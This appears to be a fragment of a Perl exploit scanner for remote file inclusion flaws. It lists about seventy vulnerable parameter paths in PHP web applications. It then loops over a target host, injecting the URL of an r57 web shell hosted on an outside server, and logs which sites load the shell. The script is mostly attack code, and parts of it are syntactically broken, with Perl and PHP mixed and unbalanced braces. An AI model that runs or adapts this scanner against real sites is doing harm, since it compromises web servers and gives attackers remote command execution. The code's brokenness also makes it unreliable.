$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";

$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
#Seu Script de Teste.
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnerable..\n";
}}
}
}